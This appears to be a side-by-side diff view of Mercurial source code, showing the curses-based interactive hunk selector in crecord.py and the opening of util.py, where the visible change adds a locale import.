1695 on the whether the fold is active or not.
1699
1696
1700 If the bottom most file is folded, it navigates to that file and
1697 If the bottom most file is folded, it navigates to that file and
1701 stops there. If the bottom most file is unfolded, it navigates to
1698 stops there. If the bottom most file is unfolded, it navigates to
1702 the bottom most hunk in that file and stops there. If the bottom most
1699 the bottom most hunk in that file and stops there. If the bottom most
1703 hunk is unfolded, it navigates to the bottom most line in that hunk.
1700 hunk is unfolded, it navigates to the bottom most line in that hunk.
1704 """
1701 """
1705 currentitem = self.currentselecteditem
1702 currentitem = self.currentselecteditem
1706 nextitem = currentitem.nextitem()
1703 nextitem = currentitem.nextitem()
1707 # select the child item recursively until we're at a footer
1704 # select the child item recursively until we're at a footer
1708 while nextitem is not None:
1705 while nextitem is not None:
1709 nextitem = currentitem.nextitem()
1706 nextitem = currentitem.nextitem()
1710 if nextitem is None:
1707 if nextitem is None:
1711 break
1708 break
1712 else:
1709 else:
1713 currentitem = nextitem
1710 currentitem = nextitem
1714
1711
1715 self.currentselecteditem = currentitem
1712 self.currentselecteditem = currentitem
1716 self.recenterdisplayedarea()
1713 self.recenterdisplayedarea()
1717
1714
1718 def confirmationwindow(self, windowtext):
1715 def confirmationwindow(self, windowtext):
1719 """display an informational window, then wait for and return a
1716 """display an informational window, then wait for and return a
1720 keypress."""
1717 keypress."""
1721
1718
1722 confirmwin = curses.newwin(self.yscreensize, 0, 0, 0)
1719 confirmwin = curses.newwin(self.yscreensize, 0, 0, 0)
1723 try:
1720 try:
1724 lines = windowtext.split(b"\n")
1721 lines = windowtext.split(b"\n")
1725 for line in lines:
1722 for line in lines:
1726 self.printstring(confirmwin, line, pairname=b"selected")
1723 self.printstring(confirmwin, line, pairname=b"selected")
1727 except curses.error:
1724 except curses.error:
1728 pass
1725 pass
1729 self.stdscr.refresh()
1726 self.stdscr.refresh()
1730 confirmwin.refresh()
1727 confirmwin.refresh()
1731 try:
1728 try:
1732 with self.ui.timeblockedsection(b'crecord'):
1729 with self.ui.timeblockedsection(b'crecord'):
1733 response = chr(self.stdscr.getch())
1730 response = chr(self.stdscr.getch())
1734 except ValueError:
1731 except ValueError:
1735 response = None
1732 response = None
1736
1733
1737 return response
1734 return response
1738
1735
1739 def reviewcommit(self):
1736 def reviewcommit(self):
1740 """ask for 'y' to be pressed to confirm selected. return True if
1737 """ask for 'y' to be pressed to confirm selected. return True if
1741 confirmed."""
1738 confirmed."""
1742 confirmtext = _(
1739 confirmtext = _(
1743 """If you answer yes to the following, your currently chosen patch chunks
1740 """If you answer yes to the following, your currently chosen patch chunks
1744 will be loaded into an editor. To modify the patch, make the changes in your
1741 will be loaded into an editor. To modify the patch, make the changes in your
1745 editor and save. To accept the current patch as-is, close the editor without
1742 editor and save. To accept the current patch as-is, close the editor without
1746 saving.
1743 saving.
1747
1744
1748 note: don't add/remove lines unless you also modify the range information.
1745 note: don't add/remove lines unless you also modify the range information.
1749 failing to follow this rule will result in the commit aborting.
1746 failing to follow this rule will result in the commit aborting.
1750
1747
1751 are you sure you want to review/edit and confirm the selected changes [yn]?
1748 are you sure you want to review/edit and confirm the selected changes [yn]?
1752 """
1749 """
1753 )
1750 )
1754 with self.ui.timeblockedsection(b'crecord'):
1751 with self.ui.timeblockedsection(b'crecord'):
1755 response = self.confirmationwindow(confirmtext)
1752 response = self.confirmationwindow(confirmtext)
1756 if response is None:
1753 if response is None:
1757 response = "n"
1754 response = "n"
1758 if response.lower().startswith("y"):
1755 if response.lower().startswith("y"):
1759 return True
1756 return True
1760 else:
1757 else:
1761 return False
1758 return False
1762
1759
1763 def recenterdisplayedarea(self):
1760 def recenterdisplayedarea(self):
1764 """
1761 """
1765 once we scrolled with pg up pg down we can be pointing outside of the
1762 once we scrolled with pg up pg down we can be pointing outside of the
1766 display zone. we print the patch with towin=False to compute the
1763 display zone. we print the patch with towin=False to compute the
1767 location of the selected item even though it is outside of the displayed
1764 location of the selected item even though it is outside of the displayed
1768 zone and then update the scroll.
1765 zone and then update the scroll.
1769 """
1766 """
1770 self.printitem(towin=False)
1767 self.printitem(towin=False)
1771 self.updatescroll()
1768 self.updatescroll()
1772
1769
1773 def toggleedit(self, item=None, test=False):
1770 def toggleedit(self, item=None, test=False):
1774 """
1771 """
1775 edit the currently selected chunk
1772 edit the currently selected chunk
1776 """
1773 """
1777
1774
1778 def updateui(self):
1775 def updateui(self):
1779 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1776 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1780 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1777 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1781 self.updatescroll()
1778 self.updatescroll()
1782 self.stdscr.refresh()
1779 self.stdscr.refresh()
1783 self.statuswin.refresh()
1780 self.statuswin.refresh()
1784 self.stdscr.keypad(1)
1781 self.stdscr.keypad(1)
1785
1782
1786 def editpatchwitheditor(self, chunk):
1783 def editpatchwitheditor(self, chunk):
1787 if chunk is None:
1784 if chunk is None:
1788 self.ui.write(_(b'cannot edit patch for whole file'))
1785 self.ui.write(_(b'cannot edit patch for whole file'))
1789 self.ui.write(b"\n")
1786 self.ui.write(b"\n")
1790 return None
1787 return None
1791 if chunk.header.binary():
1788 if chunk.header.binary():
1792 self.ui.write(_(b'cannot edit patch for binary file'))
1789 self.ui.write(_(b'cannot edit patch for binary file'))
1793 self.ui.write(b"\n")
1790 self.ui.write(b"\n")
1794 return None
1791 return None
1795
1792
1796 # write the initial patch
1793 # write the initial patch
1797 patch = stringio()
1794 patch = stringio()
1798 patch.write(diffhelptext + hunkhelptext)
1795 patch.write(diffhelptext + hunkhelptext)
1799 chunk.header.write(patch)
1796 chunk.header.write(patch)
1800 chunk.write(patch)
1797 chunk.write(patch)
1801
1798
1802 # start the editor and wait for it to complete
1799 # start the editor and wait for it to complete
1803 try:
1800 try:
1804 patch = self.ui.edit(patch.getvalue(), b"", action=b"diff")
1801 patch = self.ui.edit(patch.getvalue(), b"", action=b"diff")
1805 except error.Abort as exc:
1802 except error.Abort as exc:
1806 self.errorstr = stringutil.forcebytestr(exc)
1803 self.errorstr = stringutil.forcebytestr(exc)
1807 return None
1804 return None
1808 finally:
1805 finally:
1809 self.stdscr.clear()
1806 self.stdscr.clear()
1810 self.stdscr.refresh()
1807 self.stdscr.refresh()
1811
1808
1812 # remove comment lines
1809 # remove comment lines
1813 patch = [
1810 patch = [
1814 line + b'\n'
1811 line + b'\n'
1815 for line in patch.splitlines()
1812 for line in patch.splitlines()
1816 if not line.startswith(b'#')
1813 if not line.startswith(b'#')
1817 ]
1814 ]
1818 return patchmod.parsepatch(patch)
1815 return patchmod.parsepatch(patch)
1819
1816
1820 if item is None:
1817 if item is None:
1821 item = self.currentselecteditem
1818 item = self.currentselecteditem
1822 if isinstance(item, uiheader):
1819 if isinstance(item, uiheader):
1823 return
1820 return
1824 if isinstance(item, uihunkline):
1821 if isinstance(item, uihunkline):
1825 item = item.parentitem()
1822 item = item.parentitem()
1826 if not isinstance(item, uihunk):
1823 if not isinstance(item, uihunk):
1827 return
1824 return
1828
1825
1829 # To go back to that hunk or its replacement at the end of the edit
1826 # To go back to that hunk or its replacement at the end of the edit
1830 itemindex = item.parentitem().hunks.index(item)
1827 itemindex = item.parentitem().hunks.index(item)
1831
1828
1832 beforeadded, beforeremoved = item.added, item.removed
1829 beforeadded, beforeremoved = item.added, item.removed
1833 newpatches = editpatchwitheditor(self, item)
1830 newpatches = editpatchwitheditor(self, item)
1834 if newpatches is None:
1831 if newpatches is None:
1835 if not test:
1832 if not test:
1836 updateui(self)
1833 updateui(self)
1837 return
1834 return
1838 header = item.header
1835 header = item.header
1839 editedhunkindex = header.hunks.index(item)
1836 editedhunkindex = header.hunks.index(item)
1840 hunksbefore = header.hunks[:editedhunkindex]
1837 hunksbefore = header.hunks[:editedhunkindex]
1841 hunksafter = header.hunks[editedhunkindex + 1 :]
1838 hunksafter = header.hunks[editedhunkindex + 1 :]
1842 newpatchheader = newpatches[0]
1839 newpatchheader = newpatches[0]
1843 newhunks = [uihunk(h, header) for h in newpatchheader.hunks]
1840 newhunks = [uihunk(h, header) for h in newpatchheader.hunks]
1844 newadded = sum([h.added for h in newhunks])
1841 newadded = sum([h.added for h in newhunks])
1845 newremoved = sum([h.removed for h in newhunks])
1842 newremoved = sum([h.removed for h in newhunks])
1846 offset = (newadded - beforeadded) - (newremoved - beforeremoved)
1843 offset = (newadded - beforeadded) - (newremoved - beforeremoved)
1847
1844
1848 for h in hunksafter:
1845 for h in hunksafter:
1849 h.toline += offset
1846 h.toline += offset
1850 for h in newhunks:
1847 for h in newhunks:
1851 h.folded = False
1848 h.folded = False
1852 header.hunks = hunksbefore + newhunks + hunksafter
1849 header.hunks = hunksbefore + newhunks + hunksafter
1853 if self.emptypatch():
1850 if self.emptypatch():
1854 header.hunks = hunksbefore + [item] + hunksafter
1851 header.hunks = hunksbefore + [item] + hunksafter
1855 self.currentselecteditem = header
1852 self.currentselecteditem = header
1856 if len(header.hunks) > itemindex:
1853 if len(header.hunks) > itemindex:
1857 self.currentselecteditem = header.hunks[itemindex]
1854 self.currentselecteditem = header.hunks[itemindex]
1858
1855
1859 if not test:
1856 if not test:
1860 updateui(self)
1857 updateui(self)
1861
1858
1862 def emptypatch(self):
1859 def emptypatch(self):
1863 item = self.headerlist
1860 item = self.headerlist
1864 if not item:
1861 if not item:
1865 return True
1862 return True
1866 for header in item:
1863 for header in item:
1867 if header.hunks:
1864 if header.hunks:
1868 return False
1865 return False
1869 return True
1866 return True
1870
1867
1871 def handlekeypressed(self, keypressed, test=False):
1868 def handlekeypressed(self, keypressed, test=False):
1872 """
1869 """
1873 Perform actions based on pressed keys.
1870 Perform actions based on pressed keys.
1874
1871
1875 Return true to exit the main loop.
1872 Return true to exit the main loop.
1876 """
1873 """
1877 if keypressed in ["k", "KEY_UP"]:
1874 if keypressed in ["k", "KEY_UP"]:
1878 self.uparrowevent()
1875 self.uparrowevent()
1879 elif keypressed in ["K", "KEY_PPAGE"]:
1876 elif keypressed in ["K", "KEY_PPAGE"]:
1880 self.uparrowshiftevent()
1877 self.uparrowshiftevent()
1881 elif keypressed in ["j", "KEY_DOWN"]:
1878 elif keypressed in ["j", "KEY_DOWN"]:
1882 self.downarrowevent()
1879 self.downarrowevent()
1883 elif keypressed in ["J", "KEY_NPAGE"]:
1880 elif keypressed in ["J", "KEY_NPAGE"]:
1884 self.downarrowshiftevent()
1881 self.downarrowshiftevent()
1885 elif keypressed in ["l", "KEY_RIGHT"]:
1882 elif keypressed in ["l", "KEY_RIGHT"]:
1886 self.rightarrowevent()
1883 self.rightarrowevent()
1887 elif keypressed in ["h", "KEY_LEFT"]:
1884 elif keypressed in ["h", "KEY_LEFT"]:
1888 self.leftarrowevent()
1885 self.leftarrowevent()
1889 elif keypressed in ["H", "KEY_SLEFT"]:
1886 elif keypressed in ["H", "KEY_SLEFT"]:
1890 self.leftarrowshiftevent()
1887 self.leftarrowshiftevent()
1891 elif keypressed in ["q"]:
1888 elif keypressed in ["q"]:
1892 raise error.Abort(_(b'user quit'))
1889 raise error.Abort(_(b'user quit'))
1893 elif keypressed in ['a']:
1890 elif keypressed in ['a']:
1894 self.flipselections()
1891 self.flipselections()
1895 elif keypressed in ["c"]:
1892 elif keypressed in ["c"]:
1896 return True
1893 return True
1897 elif keypressed in ["r"]:
1894 elif keypressed in ["r"]:
1898 if self.reviewcommit():
1895 if self.reviewcommit():
1899 self.opts[b'review'] = True
1896 self.opts[b'review'] = True
1900 return True
1897 return True
1901 elif test and keypressed in ["R"]:
1898 elif test and keypressed in ["R"]:
1902 self.opts[b'review'] = True
1899 self.opts[b'review'] = True
1903 return True
1900 return True
1904 elif keypressed in [" ", "x"]:
1901 elif keypressed in [" ", "x"]:
1905 self.toggleapply()
1902 self.toggleapply()
1906 elif keypressed in ["\n", "KEY_ENTER"]:
1903 elif keypressed in ["\n", "KEY_ENTER"]:
1907 self.toggleapply()
1904 self.toggleapply()
1908 self.nextsametype(test=test)
1905 self.nextsametype(test=test)
1909 elif keypressed in ["X"]:
1906 elif keypressed in ["X"]:
1910 self.toggleallbetween()
1907 self.toggleallbetween()
1911 elif keypressed in ["A"]:
1908 elif keypressed in ["A"]:
1912 self.toggleall()
1909 self.toggleall()
1913 elif keypressed in ["e"]:
1910 elif keypressed in ["e"]:
1914 self.toggleedit(test=test)
1911 self.toggleedit(test=test)
1915 elif keypressed in ["f"]:
1912 elif keypressed in ["f"]:
1916 self.togglefolded()
1913 self.togglefolded()
1917 elif keypressed in ["F"]:
1914 elif keypressed in ["F"]:
1918 self.togglefolded(foldparent=True)
1915 self.togglefolded(foldparent=True)
1919 elif keypressed in ["m"]:
1916 elif keypressed in ["m"]:
1920 self.commitMessageWindow()
1917 self.commitMessageWindow()
1921 elif keypressed in ["g", "KEY_HOME"]:
1918 elif keypressed in ["g", "KEY_HOME"]:
1922 self.handlefirstlineevent()
1919 self.handlefirstlineevent()
1923 elif keypressed in ["G", "KEY_END"]:
1920 elif keypressed in ["G", "KEY_END"]:
1924 self.handlelastlineevent()
1921 self.handlelastlineevent()
1925 elif keypressed in ["?"]:
1922 elif keypressed in ["?"]:
1926 self.helpwindow()
1923 self.helpwindow()
1927 self.stdscr.clear()
1924 self.stdscr.clear()
1928 self.stdscr.refresh()
1925 self.stdscr.refresh()
1929 elif keypressed in [curses.ascii.ctrl("L")]:
1926 elif keypressed in [curses.ascii.ctrl("L")]:
1930 # scroll the current line to the top of the screen, and redraw
1927 # scroll the current line to the top of the screen, and redraw
1931 # everything
1928 # everything
1932 self.scrolllines(self.selecteditemstartline)
1929 self.scrolllines(self.selecteditemstartline)
1933 self.stdscr.clear()
1930 self.stdscr.clear()
1934 self.stdscr.refresh()
1931 self.stdscr.refresh()
1935
1932
1936 def main(self, stdscr):
1933 def main(self, stdscr):
1937 """
1934 """
1938 method to be wrapped by curses.wrapper() for selecting chunks.
1935 method to be wrapped by curses.wrapper() for selecting chunks.
1939 """
1936 """
1940
1937
1941 origsigwinch = sentinel = object()
1938 origsigwinch = sentinel = object()
1942 if util.safehasattr(signal, b'SIGWINCH'):
1939 if util.safehasattr(signal, b'SIGWINCH'):
1943 origsigwinch = signal.signal(signal.SIGWINCH, self.sigwinchhandler)
1940 origsigwinch = signal.signal(signal.SIGWINCH, self.sigwinchhandler)
1944 try:
1941 try:
1945 return self._main(stdscr)
1942 return self._main(stdscr)
1946 finally:
1943 finally:
1947 if origsigwinch is not sentinel:
1944 if origsigwinch is not sentinel:
1948 signal.signal(signal.SIGWINCH, origsigwinch)
1945 signal.signal(signal.SIGWINCH, origsigwinch)
1949
1946
1950 def _main(self, stdscr):
1947 def _main(self, stdscr):
1951 self.stdscr = stdscr
1948 self.stdscr = stdscr
1952 # error during initialization, cannot be printed in the curses
1949 # error during initialization, cannot be printed in the curses
1953 # interface, it should be printed by the calling code
1950 # interface, it should be printed by the calling code
1954 self.initexc = None
1951 self.initexc = None
1955 self.yscreensize, self.xscreensize = self.stdscr.getmaxyx()
1952 self.yscreensize, self.xscreensize = self.stdscr.getmaxyx()
1956
1953
1957 curses.start_color()
1954 curses.start_color()
1958 try:
1955 try:
1959 curses.use_default_colors()
1956 curses.use_default_colors()
1960 except curses.error:
1957 except curses.error:
1961 self.usecolor = False
1958 self.usecolor = False
1962
1959
1963 # In some situations we may have some cruft left on the "alternate
1960 # In some situations we may have some cruft left on the "alternate
1964 # screen" from another program (or previous iterations of ourself), and
1961 # screen" from another program (or previous iterations of ourself), and
1965 # we won't clear it if the scroll region is small enough to comfortably
1962 # we won't clear it if the scroll region is small enough to comfortably
1966 # fit on the terminal.
1963 # fit on the terminal.
1967 self.stdscr.clear()
1964 self.stdscr.clear()
1968
1965
1969 # don't display the cursor
1966 # don't display the cursor
1970 try:
1967 try:
1971 curses.curs_set(0)
1968 curses.curs_set(0)
1972 except curses.error:
1969 except curses.error:
1973 pass
1970 pass
1974
1971
1975 # available colors: black, blue, cyan, green, magenta, white, yellow
1972 # available colors: black, blue, cyan, green, magenta, white, yellow
1976 # init_pair(color_id, foreground_color, background_color)
1973 # init_pair(color_id, foreground_color, background_color)
1977 self.initcolorpair(None, None, name=b"normal")
1974 self.initcolorpair(None, None, name=b"normal")
1978 self.initcolorpair(
1975 self.initcolorpair(
1979 curses.COLOR_WHITE, curses.COLOR_MAGENTA, name=b"selected"
1976 curses.COLOR_WHITE, curses.COLOR_MAGENTA, name=b"selected"
1980 )
1977 )
1981 self.initcolorpair(curses.COLOR_RED, None, name=b"deletion")
1978 self.initcolorpair(curses.COLOR_RED, None, name=b"deletion")
1982 self.initcolorpair(curses.COLOR_GREEN, None, name=b"addition")
1979 self.initcolorpair(curses.COLOR_GREEN, None, name=b"addition")
1983 self.initcolorpair(
1980 self.initcolorpair(
1984 curses.COLOR_WHITE, curses.COLOR_BLUE, name=b"legend"
1981 curses.COLOR_WHITE, curses.COLOR_BLUE, name=b"legend"
1985 )
1982 )
1986 # newwin([height, width,] begin_y, begin_x)
1983 # newwin([height, width,] begin_y, begin_x)
1987 self.statuswin = curses.newwin(self.numstatuslines, 0, 0, 0)
1984 self.statuswin = curses.newwin(self.numstatuslines, 0, 0, 0)
1988 self.statuswin.keypad(1) # interpret arrow-key, etc. esc sequences
1985 self.statuswin.keypad(1) # interpret arrow-key, etc. esc sequences
1989
1986
1990 # figure out how much space to allocate for the chunk-pad which is
1987 # figure out how much space to allocate for the chunk-pad which is
1991 # used for displaying the patch
1988 # used for displaying the patch
1992
1989
1993 # stupid hack to prevent getnumlinesdisplayed from failing
1990 # stupid hack to prevent getnumlinesdisplayed from failing
1994 self.chunkpad = curses.newpad(1, self.xscreensize)
1991 self.chunkpad = curses.newpad(1, self.xscreensize)
1995
1992
1996 # add 1 so to account for last line text reaching end of line
1993 # add 1 so to account for last line text reaching end of line
1997 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1994 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1998
1995
1999 try:
1996 try:
2000 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1997 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
2001 except curses.error:
1998 except curses.error:
2002 self.initexc = fallbackerror(
1999 self.initexc = fallbackerror(
2003 _(b'this diff is too large to be displayed')
2000 _(b'this diff is too large to be displayed')
2004 )
2001 )
2005 return
2002 return
2006 # initialize selecteditemendline (initial start-line is 0)
2003 # initialize selecteditemendline (initial start-line is 0)
2007 self.selecteditemendline = self.getnumlinesdisplayed(
2004 self.selecteditemendline = self.getnumlinesdisplayed(
2008 self.currentselecteditem, recursechildren=False
2005 self.currentselecteditem, recursechildren=False
2009 )
2006 )
2010
2007
2011 while True:
2008 while True:
2012 self.updatescreen()
2009 self.updatescreen()
2013 try:
2010 try:
2014 with self.ui.timeblockedsection(b'crecord'):
2011 with self.ui.timeblockedsection(b'crecord'):
2015 keypressed = self.statuswin.getkey()
2012 keypressed = self.statuswin.getkey()
2016 if self.errorstr is not None:
2013 if self.errorstr is not None:
2017 self.errorstr = None
2014 self.errorstr = None
2018 continue
2015 continue
2019 except curses.error:
2016 except curses.error:
2020 keypressed = b"foobar"
2017 keypressed = b"foobar"
2021 if self.handlekeypressed(keypressed):
2018 if self.handlekeypressed(keypressed):
2022 break
2019 break
2023
2020
2024 if self.commenttext != b"":
2021 if self.commenttext != b"":
2025 whitespaceremoved = re.sub(
2022 whitespaceremoved = re.sub(
2026 br"(?m)^\s.*(\n|$)", b"", self.commenttext
2023 br"(?m)^\s.*(\n|$)", b"", self.commenttext
2027 )
2024 )
2028 if whitespaceremoved != b"":
2025 if whitespaceremoved != b"":
2029 self.opts[b'message'] = self.commenttext
2026 self.opts[b'message'] = self.commenttext
@@ -1,3598 +1,3628 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import locale
25 import mmap
26 import mmap
26 import os
27 import os
27 import platform as pyplatform
28 import platform as pyplatform
28 import re as remod
29 import re as remod
29 import shutil
30 import shutil
30 import socket
31 import socket
31 import stat
32 import stat
32 import sys
33 import sys
33 import time
34 import time
34 import traceback
35 import traceback
35 import warnings
36 import warnings
36
37
37 from .thirdparty import attr
38 from .thirdparty import attr
38 from .pycompat import (
39 from .pycompat import (
39 delattr,
40 delattr,
40 getattr,
41 getattr,
41 open,
42 open,
42 setattr,
43 setattr,
43 )
44 )
44 from hgdemandimport import tracing
45 from hgdemandimport import tracing
45 from . import (
46 from . import (
46 encoding,
47 encoding,
47 error,
48 error,
48 i18n,
49 i18n,
49 node as nodemod,
50 node as nodemod,
50 policy,
51 policy,
51 pycompat,
52 pycompat,
52 urllibcompat,
53 urllibcompat,
53 )
54 )
54 from .utils import (
55 from .utils import (
55 compression,
56 compression,
56 hashutil,
57 hashutil,
57 procutil,
58 procutil,
58 stringutil,
59 stringutil,
59 )
60 )
60
61
61 base85 = policy.importmod('base85')
62 base85 = policy.importmod('base85')
62 osutil = policy.importmod('osutil')
63 osutil = policy.importmod('osutil')
63
64
64 b85decode = base85.b85decode
65 b85decode = base85.b85decode
65 b85encode = base85.b85encode
66 b85encode = base85.b85encode
66
67
67 cookielib = pycompat.cookielib
68 cookielib = pycompat.cookielib
68 httplib = pycompat.httplib
69 httplib = pycompat.httplib
69 pickle = pycompat.pickle
70 pickle = pycompat.pickle
70 safehasattr = pycompat.safehasattr
71 safehasattr = pycompat.safehasattr
71 socketserver = pycompat.socketserver
72 socketserver = pycompat.socketserver
72 bytesio = pycompat.bytesio
73 bytesio = pycompat.bytesio
73 # TODO deprecate stringio name, as it is a lie on Python 3.
74 # TODO deprecate stringio name, as it is a lie on Python 3.
74 stringio = bytesio
75 stringio = bytesio
75 xmlrpclib = pycompat.xmlrpclib
76 xmlrpclib = pycompat.xmlrpclib
76
77
77 httpserver = urllibcompat.httpserver
78 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
79 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
80 urlreq = urllibcompat.urlreq
80
81
81 # workaround for win32mbcs
82 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
83 _filenamebytestr = pycompat.bytestr
83
84
84 if pycompat.iswindows:
85 if pycompat.iswindows:
85 from . import windows as platform
86 from . import windows as platform
86 else:
87 else:
87 from . import posix as platform
88 from . import posix as platform
88
89
89 _ = i18n._
90 _ = i18n._
90
91
91 bindunixsocket = platform.bindunixsocket
92 bindunixsocket = platform.bindunixsocket
92 cachestat = platform.cachestat
93 cachestat = platform.cachestat
93 checkexec = platform.checkexec
94 checkexec = platform.checkexec
94 checklink = platform.checklink
95 checklink = platform.checklink
95 copymode = platform.copymode
96 copymode = platform.copymode
96 expandglobs = platform.expandglobs
97 expandglobs = platform.expandglobs
97 getfsmountpoint = platform.getfsmountpoint
98 getfsmountpoint = platform.getfsmountpoint
98 getfstype = platform.getfstype
99 getfstype = platform.getfstype
99 groupmembers = platform.groupmembers
100 groupmembers = platform.groupmembers
100 groupname = platform.groupname
101 groupname = platform.groupname
101 isexec = platform.isexec
102 isexec = platform.isexec
102 isowner = platform.isowner
103 isowner = platform.isowner
103 listdir = osutil.listdir
104 listdir = osutil.listdir
104 localpath = platform.localpath
105 localpath = platform.localpath
105 lookupreg = platform.lookupreg
106 lookupreg = platform.lookupreg
106 makedir = platform.makedir
107 makedir = platform.makedir
107 nlinks = platform.nlinks
108 nlinks = platform.nlinks
108 normpath = platform.normpath
109 normpath = platform.normpath
109 normcase = platform.normcase
110 normcase = platform.normcase
110 normcasespec = platform.normcasespec
111 normcasespec = platform.normcasespec
111 normcasefallback = platform.normcasefallback
112 normcasefallback = platform.normcasefallback
112 openhardlinks = platform.openhardlinks
113 openhardlinks = platform.openhardlinks
113 oslink = platform.oslink
114 oslink = platform.oslink
114 parsepatchoutput = platform.parsepatchoutput
115 parsepatchoutput = platform.parsepatchoutput
115 pconvert = platform.pconvert
116 pconvert = platform.pconvert
116 poll = platform.poll
117 poll = platform.poll
117 posixfile = platform.posixfile
118 posixfile = platform.posixfile
118 readlink = platform.readlink
119 readlink = platform.readlink
119 rename = platform.rename
120 rename = platform.rename
120 removedirs = platform.removedirs
121 removedirs = platform.removedirs
121 samedevice = platform.samedevice
122 samedevice = platform.samedevice
122 samefile = platform.samefile
123 samefile = platform.samefile
123 samestat = platform.samestat
124 samestat = platform.samestat
124 setflags = platform.setflags
125 setflags = platform.setflags
125 split = platform.split
126 split = platform.split
126 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 statisexec = platform.statisexec
128 statisexec = platform.statisexec
128 statislink = platform.statislink
129 statislink = platform.statislink
129 umask = platform.umask
130 umask = platform.umask
130 unlink = platform.unlink
131 unlink = platform.unlink
131 username = platform.username
132 username = platform.username
132
133
133
134
134 def setumask(val):
135 def setumask(val):
135 ''' updates the umask. used by chg server '''
136 ''' updates the umask. used by chg server '''
136 if pycompat.iswindows:
137 if pycompat.iswindows:
137 return
138 return
138 os.umask(val)
139 os.umask(val)
139 global umask
140 global umask
140 platform.umask = umask = val & 0o777
141 platform.umask = umask = val & 0o777
141
142
142
143
143 # small compat layer
144 # small compat layer
144 compengines = compression.compengines
145 compengines = compression.compengines
145 SERVERROLE = compression.SERVERROLE
146 SERVERROLE = compression.SERVERROLE
146 CLIENTROLE = compression.CLIENTROLE
147 CLIENTROLE = compression.CLIENTROLE
147
148
148 try:
149 try:
149 recvfds = osutil.recvfds
150 recvfds = osutil.recvfds
150 except AttributeError:
151 except AttributeError:
151 pass
152 pass
152
153
153 # Python compatibility
154 # Python compatibility
154
155
155 _notset = object()
156 _notset = object()
156
157
157
158
158 def bitsfrom(container):
159 def bitsfrom(container):
159 bits = 0
160 bits = 0
160 for bit in container:
161 for bit in container:
161 bits |= bit
162 bits |= bit
162 return bits
163 return bits
163
164
164
165
165 # python 2.6 still have deprecation warning enabled by default. We do not want
166 # python 2.6 still have deprecation warning enabled by default. We do not want
166 # to display anything to standard user so detect if we are running test and
167 # to display anything to standard user so detect if we are running test and
167 # only use python deprecation warning in this case.
168 # only use python deprecation warning in this case.
168 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
169 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
169 if _dowarn:
170 if _dowarn:
170 # explicitly unfilter our warning for python 2.7
171 # explicitly unfilter our warning for python 2.7
171 #
172 #
172 # The option of setting PYTHONWARNINGS in the test runner was investigated.
173 # The option of setting PYTHONWARNINGS in the test runner was investigated.
173 # However, module name set through PYTHONWARNINGS was exactly matched, so
174 # However, module name set through PYTHONWARNINGS was exactly matched, so
174 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
175 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
175 # makes the whole PYTHONWARNINGS thing useless for our usecase.
176 # makes the whole PYTHONWARNINGS thing useless for our usecase.
176 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
177 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
177 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
178 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
178 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
179 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
179 if _dowarn and pycompat.ispy3:
180 if _dowarn and pycompat.ispy3:
180 # silence warning emitted by passing user string to re.sub()
181 # silence warning emitted by passing user string to re.sub()
181 warnings.filterwarnings(
182 warnings.filterwarnings(
182 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
183 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
183 )
184 )
184 warnings.filterwarnings(
185 warnings.filterwarnings(
185 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
186 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
186 )
187 )
187 # TODO: reinvent imp.is_frozen()
188 # TODO: reinvent imp.is_frozen()
188 warnings.filterwarnings(
189 warnings.filterwarnings(
189 'ignore',
190 'ignore',
190 'the imp module is deprecated',
191 'the imp module is deprecated',
191 DeprecationWarning,
192 DeprecationWarning,
192 'mercurial',
193 'mercurial',
193 )
194 )
194
195
195
196
196 def nouideprecwarn(msg, version, stacklevel=1):
197 def nouideprecwarn(msg, version, stacklevel=1):
197 """Issue an python native deprecation warning
198 """Issue an python native deprecation warning
198
199
199 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
